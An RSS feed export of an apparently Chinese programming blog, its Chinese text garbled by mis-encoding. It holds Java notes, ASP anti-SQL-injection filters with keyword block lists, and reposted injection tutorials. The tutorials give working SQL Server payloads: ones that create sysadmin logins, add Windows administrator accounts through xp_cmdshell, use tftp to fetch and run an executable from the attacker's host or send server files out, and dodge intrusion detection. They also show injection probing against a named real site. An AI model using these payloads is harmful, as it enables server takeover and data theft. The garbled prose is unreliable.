锘??xml version="1.0" encoding="utf-8" standalone="yes"?>亚洲乱码中文字幕手机在线,一本色道久久综合亚洲精品,亚洲真人日本在线http://m.tkk7.com/lmsun/zh-cnWed, 14 May 2025 16:06:44 GMTWed, 14 May 2025 16:06:44 GMT60corejava璇諱功絎旇http://m.tkk7.com/lmsun/archive/2006/06/23/54655.htmlmy javamy javaFri, 23 Jun 2006 05:25:00 GMThttp://m.tkk7.com/lmsun/archive/2006/06/23/54655.htmlhttp://m.tkk7.com/lmsun/comments/54655.htmlhttp://m.tkk7.com/lmsun/archive/2006/06/23/54655.html#Feedback3http://m.tkk7.com/lmsun/comments/commentRss/54655.htmlhttp://m.tkk7.com/lmsun/services/trackbacks/54655.html2.1瀹夎java
1銆乯ava宸ュ叿鍖?a >http://java.sun.com/j2se/1.4/install-windows.html
2銆佽緗墽琛岀幆澧冿紙windows 2000)
PATH=c:\jdk\bin;
3銆佸畨瑁呭簱婧愭枃浠跺拰鏂囨。
jar xvf src.jar
jar xvf j2sdkversion-doc.zip

絎竴涓猨ava渚嬪瓙
eg:Weclome.java

public class Welcome
{
public static void main(String[] args)
{
String[] greeting=new String[3];
greeting[0]="Welcome to Core Java";
greeting[1]="by Car Horstman";
greeting[2]="and Gary Cornell";
for ( int i=0;i<greeting.length;i++)
System.out.println(greeting[i]);
}
}



my java 2006-06-23 13:25 鍙戣〃璇勮
]]>
jspsmartupload浣跨敤鎶宸?/title><link>http://m.tkk7.com/lmsun/archive/2006/06/23/54613.html</link><dc:creator>my java</dc:creator><author>my java</author><pubDate>Fri, 23 Jun 2006 01:34:00 GMT</pubDate><guid>http://m.tkk7.com/lmsun/archive/2006/06/23/54613.html</guid><wfw:comment>http://m.tkk7.com/lmsun/comments/54613.html</wfw:comment><comments>http://m.tkk7.com/lmsun/archive/2006/06/23/54613.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.tkk7.com/lmsun/comments/commentRss/54613.html</wfw:commentRss><trackback:ping>http://m.tkk7.com/lmsun/services/trackbacks/54613.html</trackback:ping><description><![CDATA[1銆佽幏寰楄〃鍗曚腑鏂囨湰妗嗙殑鏁版嵁錛?br />mySmartUpload.getRequest().getParameter("applyusrname")<br />java.util.Enumeration e = mySmartUpload.getRequest().getParameterNames();<img src ="http://m.tkk7.com/lmsun/aggbug/54613.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.tkk7.com/lmsun/" target="_blank">my java</a> 2006-06-23 09:34 <a href="http://m.tkk7.com/lmsun/archive/2006/06/23/54613.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>闃睸QL娉ㄥ叆http://m.tkk7.com/lmsun/archive/2006/02/05/29575.htmlmy javamy javaSun, 05 Feb 2006 02:23:00 GMThttp://m.tkk7.com/lmsun/archive/2006/02/05/29575.htmlhttp://m.tkk7.com/lmsun/comments/29575.htmlhttp://m.tkk7.com/lmsun/archive/2006/02/05/29575.html#Feedback0http://m.tkk7.com/lmsun/comments/commentRss/29575.htmlhttp://m.tkk7.com/lmsun/services/trackbacks/29575.html<%
function sqlcheck(Str,errtype)
if Instr(LCase(Str),"select ") > 0 or Instr(LCase(Str),"insert ") > 0 or Instr(LCase(Str),"delete ") > 0 or Instr(LCase(Str),"delete from ") > 0 or Instr(LCase(Str),"count(") > 0 or Instr(LCase(Str),"drop table") > 0 or Instr(LCase(Str),"update ") > 0 or Instr(LCase(Str),"truncate ") > 0 or Instr(LCase(Str),"asc(") > 0 or Instr(LCase(Str),"mid(") > 0 or Instr(LCase(Str),"char(") > 0 or Instr(LCase(Str),"xp_cmdshell") > 0 or Instr(LCase(Str),"exec master") > 0 or Instr(LCase(Str),"net localgroup administrators") > 0  or Instr(LCase(Str),"and ") > 0 or Instr(LCase(Str),"net user") > 0 or Instr(LCase(Str),"or ") > 0 then
 Response.write("<script language=javascript>" & vbcrlf & "window.location.href ='ShowError.asp?errtype=" & errtype & "'" & vbcrlf & "</script>")
 Response.End
end if
Str=Replace(Str,"_","")     '榪囨護(hù)SQL娉ㄥ叆_
Str=Replace(Str,"*","")     '榪囨護(hù)SQL娉ㄥ叆*
Str=Replace(Str," ","")     '榪囨護(hù)SQL娉ㄥ叆絀烘牸
Str=Replace(Str,chr(34),"")   '榪囨護(hù)SQL娉ㄥ叆"
Str=Replace(Str,chr(39),"")            '榪囨護(hù)SQL娉ㄥ叆'
Str=Replace(Str,chr(91),"")            '榪囨護(hù)SQL娉ㄥ叆[
Str=Replace(Str,chr(93),"")            '榪囨護(hù)SQL娉ㄥ叆]
Str=Replace(Str,chr(37),"")            '榪囨護(hù)SQL娉ㄥ叆%
Str=Replace(Str,chr(58),"")            '榪囨護(hù)SQL娉ㄥ叆:
Str=Replace(Str,chr(59),"")            '榪囨護(hù)SQL娉ㄥ叆;
Str=Replace(Str,chr(43),"")            '榪囨護(hù)SQL娉ㄥ叆+
Str=Replace(Str,"{","")            '榪囨護(hù)SQL娉ㄥ叆{
Str=Replace(Str,"}","")            '榪囨護(hù)SQL娉ㄥ叆}
sqlcheck=Str            '榪斿洖緇忚繃涓婇潰瀛楃鏇挎崲鍚庣殑Str
end function
%>


function SafeRequest(ParaName,ParaType)
'--- 浼犲叆鍙傛暟 ---
'ParaName:鍙傛暟鍚嶇О-瀛楃鍨?
'ParaType:鍙傛暟綾誨瀷-鏁板瓧鍨?1琛ㄧず浠ヤ笂鍙傛暟鏄暟瀛楋紝0琛ㄧず浠ヤ笂鍙傛暟涓哄瓧絎?

Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "鍙傛暟" & ParaName & "蹇呴』涓烘暟瀛楀瀷錛?
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function


Function SafeRequest(ParaValue,ParaType)
       '--- 浼犲叆鍙傛暟 ---
       'ParaName:鍙傛暟鍚嶇О-瀛楃鍨?BR>       'ParaType:鍙傛暟綾誨瀷-鏁板瓧鍨?1琛ㄧず浠ヤ笂鍙傛暟鏄暟瀛楋紝0琛ㄧず浠ヤ笂鍙傛暟涓哄瓧絎?

       'Dim ParaValue
       'ParaValue=Request(ParaName)鍑芥暟閲岄潰鏄笉瑕佸姞寮曞彿
       If ParaType=1 then
              If not isNumeric(ParaValue) then
                   Response.write " 鍙傛暟" & ParaName & "蹇呴』涓烘暟瀛楀瀷錛?
                     Response.end
              End if
       Else
              ParaValue=replace(ParaValue,"'","")
     ParaValue=replace(ParaValue,";and 1=1","")
     ParaValue=replace(ParaValue,";and 1=2","")
     ParaValue=replace(ParaValue,";and user>0","")
     ParaValue=replace(ParaValue,">","")
     ParaValue=replace(ParaValue,"<","")
     ParaValue=replace(ParaValue,"=","")
     ParaValue=replace(ParaValue,"count","")
     ParaValue=replace(ParaValue,"select","")
     ParaValue=replace(ParaValue,"drop","")
     ParaValue=replace(ParaValue,"delect","")
     ParaValue=replace(ParaValue,"insert","")
     ParaValue=replace(ParaValue,"execute","")
     ParaValue=replace(ParaValue,"update","")    
     ParaValue=replace(ParaValue,"mid","")
     ParaValue=replace(ParaValue,"exec","")
     ParaValue=replace(ParaValue,"master","")
     ParaValue=replace(ParaValue,"char","")
     ParaValue=replace(ParaValue,"declare","")
     ParaValue=replace(ParaValue,"*","")
     ParaValue=replace(ParaValue,"%","")
     ParaValue=replace(ParaValue,"chr","")
     ParaValue=replace(ParaValue,"truncate","")
       End if
       SafeRequest=ParaValue
End function
'璋冪敤鏂瑰紡
DirID=Request("DirID")'///鏁版嵁鐩綍鍚嶇О鍙傛暟/鏃犲垯琛ㄧず鍏ㄩ儴鏁版嵁
DirID=SafeRequest(DirID,1)


Dim SQL_inbreakstr
SQL_inbreakstr = "'|or|and|exec|insert|select|delete|update|drop|count|*|%|chr|mid|master|truncate|char|declare"
SQL_inbreak = split(SQL_inbreakstr,"|")
R_Q=Request.QueryString
R_F=Request.Form
IF R_Q<>"" THEN
 For i=0 To Ubound(SQL_inbreak)
  IF instr(R_Q,SQL_inbreak(i))>0 THEN
   Response.Write "*****"
                           Response.End
  END IF
 Next
End IF

IF R_F<>"" THEN
 For i=0 To Ubound(SQL_inbreak)
  IF instr(R_F,SQL_inbreak(i))>0 THEN
   Response.Write "*****"
                           Response.End
  END IF
 Next
END IF


<%
'--------鐗堟潈璇存槑------------------
'SQL閫氱敤闃叉敞鍏ョ▼搴?V2.0 瀹岀編鐗?BR>'鏈▼搴忕敱 鐏嫄-鏋煡縐?鐙珛寮鍙?BR>'瀵規(guī)湰紼嬪簭鏈変換浣曠枒闂鑱旂郴鏈漢
'QQ:613548

'--------瀹氫箟閮ㄤ喚------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
'鑷畾涔夐渶瑕佽繃婊ょ殑瀛椾覆,鐢?"鏋? 鍒嗛殧
Fy_In = "'鏋?鏋玜nd鏋玡xec鏋玦nsert鏋玸elect鏋玠elete鏋玼pdate鏋玞ount鏋?鏋?鏋玞hr鏋玬id鏋玬aster鏋玹runcate鏋玞har鏋玠eclare"
'----------------------------------
%>

<%
Fy_Inf = split(Fy_In,"鏋?)
'--------POST閮ㄤ喚------------------
If Request.Form<>"" Then
For Each Fy_Post In Request.Form

For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then
'--------鍐欏叆鏁版嵁搴?------澶?-------
Fy_dbstr="DBQ="+server.mappath("SqlIn.mdb")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
Set Fy_db=Server.CreateObject("ADODB.CONNECTION")
Fy_db.open Fy_dbstr
Fy_db.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','POST','"&Fy_Post&"','"&replace(Request.Form(Fy_Post),"'","''")&"')")
Fy_db.close
Set Fy_db = Nothing
'--------鍐欏叆鏁版嵁搴?------灝?-------

Response.Write "<Script Language=JavaScript>alert('鏋綉SQL閫氱敤闃叉敞鍏ョ郴緇熸彁紺衡啌\n\n璇蜂笉瑕佸湪鍙傛暟涓寘鍚潪娉曞瓧絎﹀皾璇曟敞鍏ワ紒\n\nHTTP://WwW.WrSkY.CoM  緋葷粺鐗堟湰:V2.0(ASP)瀹岀編鐗?);</Script>"
Response.Write "闈炴硶鎿嶄綔錛佺郴緇熷仛浜?jiǎn)濡備笅璁板綍鈫?lt;br>"
Response.Write "鎿嶄綔錛╋及錛?&Request.ServerVariables("REMOTE_ADDR")&"<br>"
Response.Write "鎿嶄綔鏃墮棿錛?&Now&"<br>"
Response.Write "鎿嶄綔欏甸潰錛?&Request.ServerVariables("URL")&"<br>"
Response.Write "鎻愪氦鏂瑰紡錛氾及錛汲錛?lt;br>"
Response.Write "鎻愪氦鍙傛暟錛?&Fy_Post&"<br>"
Response.Write "鎻愪氦鏁版嵁錛?&Request.Form(Fy_Post)
Response.End
End If
Next

Next
End If
'----------------------------------

'--------GET閮ㄤ喚-------------------
If Request.QueryString<>"" Then
For Each Fy_Get In Request.QueryString

For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QueryString(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
''--------鍐欏叆鏁版嵁搴?------澶?-------
Fy_dbstr="DBQ="+server.mappath("SqlIn.mdb")+";DefaultDir=;DRIVER={Microsoft Access Driver (*.mdb)};"
Set Fy_db=Server.CreateObject("ADODB.CONNECTION")
Fy_db.open Fy_dbstr
Fy_db.Execute("insert into SqlIn(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('"&Request.ServerVariables("REMOTE_ADDR")&"','"&Request.ServerVariables("URL")&"','GET','"&Fy_Get&"','"&replace(Request.QueryString(Fy_Get),"'","''")&"')")
Fy_db.close
Set Fy_db = Nothing
'--------鍐欏叆鏁版嵁搴?------灝?-------

Response.Write "<Script Language=JavaScript>alert('鏋綉SQL閫氱敤闃叉敞鍏ョ郴緇熸彁紺衡啌\n\n璇蜂笉瑕佸湪鍙傛暟涓寘鍚潪娉曞瓧絎﹀皾璇曟敞鍏ワ紒\n\nHTTP://WwW.WrSkY.CoM  緋葷粺鐗堟湰:V2.0(ASP)瀹岀編鐗?);</Script>"
Response.Write "闈炴硶鎿嶄綔錛佺郴緇熷仛浜?jiǎn)濡備笅璁板綍鈫?lt;br>"
Response.Write "鎿嶄綔錛╋及錛?&Request.ServerVariables("REMOTE_ADDR")&"<br>"
Response.Write "鎿嶄綔鏃墮棿錛?&Now&"<br>"
Response.Write "鎿嶄綔欏甸潰錛?&Request.ServerVariables("URL")&"<br>"
Response.Write "鎻愪氦鏂瑰紡錛氾姬錛ワ即<br>"
Response.Write "鎻愪氦鍙傛暟錛?&Fy_Get&"<br>"
Response.Write "鎻愪氦鏁版嵁錛?&Request.QueryString(Fy_Get)
Response.End
End If
Next
Next
End If
'----------------------------------
%>

鍙互闃叉鎵鏈夊緱sql娉ㄥ叆錛?BR>Function SafeRequest(ParaName,ParaType)
 '--- 闃叉SQL娉ㄥ叆 ---
 'ParaName:鍙傛暟鍚嶇О-瀛楃鍨?BR> 'ParaType:鍙傛暟綾誨瀷-鏁板瓧鍨?1琛ㄧず浠ヤ笂鍙傛暟鏄暟瀛楋紝0琛ㄧず浠ヤ笂鍙傛暟涓哄瓧絎?
 Dim ParaValue
 ParaValue=Request(ParaName)
 If ParaType=1 then
  If not isNumeric(ParaValue) then
   Response.write "<br><br><br><center><font color=red>鍙傛暟" & ParaName & "蹇呴』涓烘暟瀛楀瀷錛?
   Response.end
  End if
 Else
  ParaValue=replace(ParaValue,"'","''")
 End if
 SafeRequest=ParaValue
End function
鏉ユ簮錛?A >http://www.yesky.com/305/1899305.shtml



my java 2006-02-05 10:23 鍙戣〃璇勮
]]>
妗傛灄鑰佸叺鐨凷QLSERVER楂樼駭娉ㄥ叆鎶宸?杞笘)http://m.tkk7.com/lmsun/archive/2006/02/05/29571.htmlmy javamy javaSun, 05 Feb 2006 02:04:00 GMThttp://m.tkk7.com/lmsun/archive/2006/02/05/29571.htmlhttp://m.tkk7.com/lmsun/comments/29571.htmlhttp://m.tkk7.com/lmsun/archive/2006/02/05/29571.html#Feedback0http://m.tkk7.com/lmsun/comments/commentRss/29571.htmlhttp://m.tkk7.com/lmsun/services/trackbacks/29571.html

[鑾峰緱鏁版嵁琛ㄥ悕][灝嗗瓧孌靛兼洿鏂頒負(fù)琛ㄥ悕錛屽啀鎯蟲(chóng)硶璇誨嚭榪欎釜瀛楁鐨勫煎氨鍙緱鍒拌〃鍚峕
update 琛ㄥ悕 set 瀛楁=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>'浣犲緱鍒扮殑琛ㄥ悕' 鏌ュ嚭涓涓姞涓涓猐) [ where 鏉′歡]


[鑾峰緱鏁版嵁琛ㄥ瓧孌靛悕][灝嗗瓧孌靛兼洿鏂頒負(fù)瀛楁鍚嶏紝鍐嶆兂娉曡鍑?guó)櫩欎釜瀛棇D電殑鍊煎氨鍙緱鍒板瓧孌靛悕]
update 琛ㄥ悕 set 瀛楁=(select top 1 col_name(object_id('瑕佹煡璇㈢殑鏁版嵁琛ㄥ悕'),瀛楁鍒楀:1) [ where 鏉′歡]


涔熷彲浠ヨ繖鏍鋒洿綆鎹風(fēng)殑鑾峰彇琛ㄥ悕錛?/P>


select top 1 name from sysobjects where xtype=u and status>0 and name not in('table1','table2',鈥?

閫氳繃SQLSERVER娉ㄥ叆婕忔礊寤烘暟鎹簱綆$悊鍛樺笎鍙峰拰緋葷粺綆$悊鍛樺笎鍙穂褰撳墠甯愬彿蹇呴』鏄疭YSADMIN緇刔


news.asp?id=2;exec master.dbo.sp_addlogin test,test;-- //娣誨姞鏁版嵁搴撶敤鎴風(fēng)敤鎴穞est,瀵嗙爜涓簍est
news.asp?id=2;exec master.dbo.sp_password test,123456,test;-- //濡傛灉鎯蟲(chóng)敼瀵嗙爜錛屽垯鐢ㄨ繖鍙ワ紙灝唗est鐨勫瘑鐮佹敼涓?23456錛?BR>news.asp?id=2;exec master.dbo.sp_addsrvrolemember test,sysadmin;-- //灝唗est鍔犲埌sysadmin緇?榪欎釜緇勭殑鎴愬憳鍙墽琛屼換浣曟搷浣?BR>news.asp?id=2;exec master.dbo.xp_cmdshell 'net user test test /add';-- //娣誨姞緋葷粺鐢ㄦ埛test,瀵嗙爜涓簍est
news.asp?id=2;exec master.dbo.xp_cmdshell 'net localgroup administrators test /add';-- //灝嗙郴緇熺敤鎴穞est鎻愬崌涓虹鐞嗗憳


榪欐牱錛屼綘鍦ㄤ粬鐨勬暟鎹簱鍜岀郴緇熷唴閮界暀涓嬩簡(jiǎn)test綆$悊鍛樿處鍙蜂簡(jiǎn)

涓嬮潰鏄浣曚粠浣犵殑鏈嶅櫒涓嬭澆鏂囦歡file.exe鍚庤繍琛屽畠[鍓嶆彁鏄綘蹇呴』灝嗕綘鐨勭數(shù)鑴戣涓篢FTP鏈嶅姟鍣紝灝?9绔彛鎵撳紑]


id=2; exec master.dbo.xp_cmdshell 'tftp 鈥搃 浣犵殑IP get file.exe';--


鐒跺悗榪愯榪欎釜鏂囦歡錛?BR>id=2; exec master.dbo.xp_cmdshell 'file.exe';--


涓嬭澆鏈嶅姟鍣ㄧ殑鏂囦歡file2.doc鍒版湰鍦癟FTP鏈嶅姟鍣╗鏂囦歡蹇呴』瀛樺湪]:


id=2; exec master.dbo.xp_cmdshell 'tftp 鈥搃 浣犵殑IP Put file2.doc';--


緇曡繃IDS鐨勬嫻媅浣跨敤鍙橀噺]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm鈥?鈥檇shell' exec @a 'dir c:\'



my java 2006-02-05 10:04 鍙戣〃璇勮
]]>
SQL娉ㄥ叆澶╀功http://m.tkk7.com/lmsun/archive/2006/02/05/29570.htmlmy javamy javaSun, 05 Feb 2006 01:58:00 GMThttp://m.tkk7.com/lmsun/archive/2006/02/05/29570.htmlhttp://m.tkk7.com/lmsun/comments/29570.htmlhttp://m.tkk7.com/lmsun/archive/2006/02/05/29570.html#Feedback0http://m.tkk7.com/lmsun/comments/commentRss/29570.htmlhttp://m.tkk7.com/lmsun/services/trackbacks/29570.html
錛籌急錛敞鍏ユ槸浠庢甯哥殑WWW绔彛璁塊棶錛岃屼笖琛ㄩ潰鐪嬭搗鏉ヨ窡涓鑸殑Web欏甸潰璁塊棶娌′粈涔堝尯鍒紝鎵浠ョ洰鍓嶅競(jìng)闈㈢殑闃茬伀澧欓兘涓嶄細(xì)瀵癸汲錛憋棘娉ㄥ叆鍙戝嚭璀︽姤錛屽鏋滅鐞嗗憳娌℃煡鐪婭IS*蹇楃殑涔?fàn)鎯Q屽彲鑳借鍏ヤ鏡寰堥暱鏃墮棿閮戒笉浼?xì)鍙戣銆?

浣嗘槸錛岋汲錛憋棘娉ㄥ叆鐨勬墜娉曠浉褰撶伒媧伙紝鍦ㄦ敞鍏ョ殑鏃跺欎細(xì)紕板埌寰堝鎰忓鐨勬儏鍐點(diǎn)傝兘涓嶈兘鏍規(guī)嵁鍏蜂綋鎯呭喌榪涜鍒嗘瀽錛屾瀯閫犲閥濡欑殑SQL璇彞錛屼粠鑰屾垚鍔熻幏鍙栨兂瑕佺殑鏁版嵁錛屾槸楂樻墜涓庘滆彍楦熲濈殑鏍規(guī)湰鍖哄埆銆?

鏍規(guī)嵁鍥芥儏錛屽浗鍐呯殑緗戠珯鐢ˋSP Access鎴朣QLServer鐨勫崰70%浠ヤ笂錛孭HP MySQ鍗燣20%錛屽叾浠栫殑涓嶈凍10%銆傚湪鏈枃錛屾垜浠粠鍒嗗叆闂ㄣ佽繘闃惰嚦楂樼駭璁茶В涓涓婣SP娉ㄥ叆鐨勬柟娉曞強(qiáng)鎶宸э紝PHP娉ㄥ叆鐨勬枃绔犵敱NB鑱旂洘鐨勫彟涓浣嶆湅鍙媧well鎾板啓錛屽笇鏈涘瀹夊叏宸ヤ綔鑰呭拰紼嬪簭鍛橀兘鏈夌敤澶勩備簡(jiǎn)瑙SP娉ㄥ叆鐨勬湅鍙嬩篃璇蜂笉瑕佽煩榪囧叆闂ㄧ瘒錛屽洜涓洪儴鍒嗕漢瀵規(guī)敞鍏ョ殑鍩烘湰鍒ゆ柇鏂規(guī)硶榪樺瓨鍦ㄨ鍖恒傚ぇ瀹跺噯澶囧ソ浜?jiǎn)鍚楀Q烲et's Go...

鍏?闂?綃?

濡傛灉浣犱互鍓嶆病璇曡繃錛籌急錛敞鍏ョ殑璇濓紝閭d箞絎竴姝ュ厛鎶奍E鑿滃崟=>宸ュ叿=>Internet閫夐」=>楂樼駭=>鏄劇ず鍙嬪ソHTTP 閿欒淇℃伅鍓嶉潰鐨勫嬀鍘繪帀銆傚惁鍒欙紝涓嶈鏈嶅姟鍣ㄨ繑鍥炰粈涔堥敊璇紝IE閮藉彧鏄劇ず涓篐TTP 500鏈嶅姟鍣ㄩ敊璇紝涓嶈兘鑾峰緱鏇村鐨勬彁紺轟俊鎭?

絎竴鑺傘侊汲錛憋棘娉ㄥ叆鍘熺悊

浠ヤ笅鎴戜滑浠庝竴涓綉www.19cn.com寮濮嬶紙娉細(xì)鏈枃鍙戣〃鍓嶅凡寰佸緱璇ョ珯绔欓暱鍚屾剰錛屽ぇ閮ㄥ垎閮芥槸鐪熷疄鏁版嵁錛夈?

鍦ㄧ綉绔欓欏典笂錛屾湁鍚嶄負(fù)鈥淚E涓嶈兘鎵撳紑鏂扮獥鍙g殑澶氱瑙e喅鏂規(guī)硶鈥濈殑閾炬帴錛屽湴鍧涓猴細(xì)http://www.19cn.com/showdetail.asp?id=49錛屾垜浠湪榪欎釜鍦板潃鍚庨潰鍔犱笂鍗曞紩鍙封欙紝鏈嶅姟鍣ㄤ細(xì)榪斿洖涓嬮潰鐨勯敊璇彁紺猴細(xì)

Microsoft JET Database Engine 閿欒 '80040e14'瀛楃涓茬殑璇硶閿欒 鍦ㄦ煡璇㈣〃杈懼紡 'ID=49'' 涓?

/showdetail.asp錛岃8

浠庤繖涓敊璇彁紺烘垜浠兘鐪嬪嚭涓嬮潰鍑犵偣錛?

1.緗戠珯浣跨敤鐨勬槸Access鏁版嵁搴擄紝閫氳繃JET寮曟搸榪炴帴鏁版嵁搴擄紝鑰屼笉鏄氳繃ODBC銆?

2. 紼嬪簭娌℃湁鍒ゆ柇瀹㈡埛绔彁浜ょ殑鏁版嵁鏄惁絎﹀悎紼嬪簭瑕佹眰銆?

3. 璇QL璇彞鎵鏌ヨ鐨勮〃涓湁涓鍚嶄負(fù)ID鐨勫瓧孌點(diǎn)?

浠庝笂闈㈢殑渚嬪瓙鎴戜滑鍙互鐭ラ亾錛岋汲錛憋棘娉ㄥ叆鐨勫師鐞嗭紝灝辨槸浠庡鎴風(fēng)鎻愪氦鐗規(guī)畩鐨勪唬鐮侊紝浠庤屾敹闆嗙▼搴忓強(qiáng)鏈嶅姟鍣ㄧ殑淇℃伅錛屼粠鑰岃幏鍙栦綘鎯沖埌寰楀埌鐨勮祫鏂欍?

絎簩鑺傘佸垽鏂兘鍚﹁繘琛岋汲錛憋棘娉ㄥ叆

鐪嬪畬絎竴鑺傦紝鏈変竴浜涗漢浼?xì)瑙夊緱锛?xì)鎴戜篃鏄粡甯歌繖鏍鋒祴璇曡兘鍚︽敞鍏ョ殑錛岃繖涓嶆槸寰堢畝鍗曞悧錛?

鍏跺疄錛岃繖騫朵笉鏄渶濂界殑鏂規(guī)硶錛屼負(fù)浠涔堝憿錛?
棣栧厛錛屼笉涓瀹氭瘡鍙版湇鍔″櫒鐨処IS閮借繑鍥炲叿浣撻敊璇彁紺虹粰瀹㈡埛绔紝濡傛灉紼嬪簭涓姞浜?jiǎn)cint(鍙傛暟)涔嬬被璇彞鐨勮瘽錛岋汲錛憋棘娉ㄥ叆鏄笉浼?xì)鎴愬姛鐨勫Q屼絾鏈嶅姟鍣ㄥ悓鏍蜂細(xì)鎶ラ敊錛屽叿浣撴彁紺轟俊鎭負(fù)澶勭悊 URL 鏃舵湇鍔″櫒涓婂嚭閿欍傝鍜岀郴緇熺鐞嗗憳鑱旂粶銆?

鍏舵錛岄儴鍒嗗錛籌急錛敞鍏ユ湁涓鐐逛簡(jiǎn)瑙g殑紼嬪簭鍛橈紝璁や負(fù)鍙鎶婂崟寮曞彿榪囨護(hù)鎺夊氨瀹夊叏浜?jiǎn)锛寴q欑鎯呭喌涓嶄負(fù)灝戞暟錛屽鏋滀綘鐢ㄥ崟寮曞彿嫻嬭瘯錛屾槸嫻嬩笉鍒版敞鍏ョ偣鐨勯偅涔堬紝浠涔堟牱鐨勬祴璇曟柟娉曟墠鏄瘮杈冨噯紜憿錛熺瓟妗堝涓嬶細(xì)

鈶?http://www.19cn.com/showdetail.asp?id=49

鈶?http://www.19cn.com/showdetail.asp?id=49 ;;and 1=1

鈶?http://www.19cn.com/showdetail.asp?id=49 ;;and 1=2

榪欏氨鏄粡鍏哥殑1=1銆?=2嫻嬭瘯娉曚簡(jiǎn)錛屾庝箞鍒ゆ柇鍛紵鐪嬬湅涓婇潰涓変釜緗戝潃榪斿洖鐨勭粨鏋滃氨鐭ラ亾浜?jiǎn)锛?xì)

鍙互娉ㄥ叆鐨勮〃鐜幫細(xì)

鈶?姝e父鏄劇ず錛堣繖鏄繀鐒剁殑錛屼笉鐒跺氨鏄▼搴忔湁閿欒浜?jiǎn)锛?jí)

鈶?姝e父鏄劇ず錛屽唴瀹瑰熀鏈笌鈶犵浉鍚?

鈶?鎻愮ずBOF鎴朎OF錛堢▼搴忔病鍋氫換浣曞垽鏂椂錛夈佹垨鎻愮ず鎵句笉鍒拌褰曪紙鍒ゆ柇浜?jiǎn)rs.eof鏃訛級(jí)銆佹垨鏄劇ず鍐呭涓虹┖錛堢▼搴忓姞浜?jiǎn)on error resume next錛変笉鍙互娉ㄥ叆灝辨瘮杈冨鏄撳垽鏂簡(jiǎn)錛屸憼鍚屾牱姝e父鏄劇ず錛屸憽鍜屸憿涓鑸兘浼?xì)鏈壗E嬪簭瀹氫箟鐨勯敊璇彁紺猴紝鎴栨彁紺虹被鍨嬭漿鎹㈡椂鍑洪敊銆?

銆銆褰撶劧錛岃繖鍙槸浼犲叆鍙傛暟鏄暟瀛楀瀷鐨勬椂鍊欑敤鐨勫垽鏂柟娉曪紝瀹為檯搴旂敤鐨勬椂鍊欎細(xì)鏈夊瓧絎﹀瀷鍜屾悳绱㈠瀷鍙傛暟錛屾垜灝嗗湪涓駭綃囩殑鈥滐汲錛憋棘娉ㄥ叆涓鑸楠も濆啀鍋氬垎鏋愩?

絎笁鑺傘佸垽鏂暟鎹簱綾誨瀷鍙?qiáng)娉ㄥ叆鏂规?

涓嶅悓鐨勬暟鎹簱鐨勫嚱鏁般佹敞鍏ユ柟娉曢兘鏄湁宸紓鐨勶紝鎵浠ュ湪娉ㄥ叆涔嬪墠錛屾垜浠繕瑕佸垽鏂竴涓嬫暟鎹簱鐨勭被鍨嬨備竴鑸珹SP鏈甯告惌閰嶇殑鏁版嵁搴撴槸Access鍜孲QLServer錛岀綉涓婅秴榪?9%鐨勭綉绔欓兘鏄叾涓箣涓銆?

鎬庝箞璁╃▼搴忓憡璇変綘瀹冧嬌鐢ㄧ殑浠涔堟暟鎹簱鍛紵鏉ョ湅鐪嬶細(xì)

SQLServer鏈変竴浜涚郴緇熷彉閲忥紝濡傛灉鏈嶅姟鍣↖IS鎻愮ず娌″叧闂紝騫朵笖SQLServer榪斿洖閿欒鎻愮ず鐨勮瘽錛岄偅鍙互鐩存帴浠庡嚭閿欎俊鎭幏鍙栵紝鏂規(guī)硶濡備笅錛?

http://www.19cn.com/showdetail.asp?id=49;;and user>0

榪欏彞璇彞寰堢畝鍗曪紝浣嗗嵈鍖呭惈浜?jiǎn)SQLServer鐗規(guī)湁娉ㄥ叆鏂規(guī)硶鐨勭簿楂擄紝鎴戣嚜宸變篃鏄湪涓嬈℃棤鎰忕殑嫻嬭瘯涓彂鐜拌繖縐嶆晥鐜囨瀬楂樼殑鐚滆В鏂規(guī)硶銆傝鎴戠湅鏉ョ湅鐪嬪畠鐨勫惈涔夛細(xì)棣栧厛錛屽墠闈㈢殑璇彞鏄甯哥殑錛岄噸鐐瑰湪anduser>0錛屾垜浠煡閬擄紝user鏄疭QLServer鐨勪竴涓唴緗彉閲忥紝瀹冪殑鍊兼槸褰撳墠榪炴帴鐨勭敤鎴峰悕錛岀被鍨嬩負(fù)nvarchar銆傛嬁涓涓猲varchar鐨勫艱窡int鐨勬暟0姣旇緝錛岀郴緇熶細(xì)鍏堣瘯鍥懼皢nvarchar鐨勫艱漿鎴恑nt鍨嬶紝褰撶劧錛岃漿鐨勮繃紼嬩腑鑲畾浼?xì)鍑洪敊锛孲QLServer鐨勫嚭閿欐彁紺烘槸錛氬皢nvarchar鍊?鈥漚bc鈥?杞崲鏁版嵁綾誨瀷涓?int 鐨勫垪鏃跺彂鐢熻娉曢敊璇紝鍛靛懙錛宎bc姝f槸鍙橀噺user鐨勫鹼紝榪欐牱錛屼笉搴熷惞鐏頒箣鍔涘氨鎷垮埌浜?jiǎn)鏁版嵁搴撶殑鐢ㄦ埛鍚嶃傚湪浠ュ悗鐨勭瘒騫呴噷錛屽ぇ瀹朵細(xì)鐪嬪埌寰堝鐢ㄨ繖縐嶆柟娉曠殑璇彞銆?

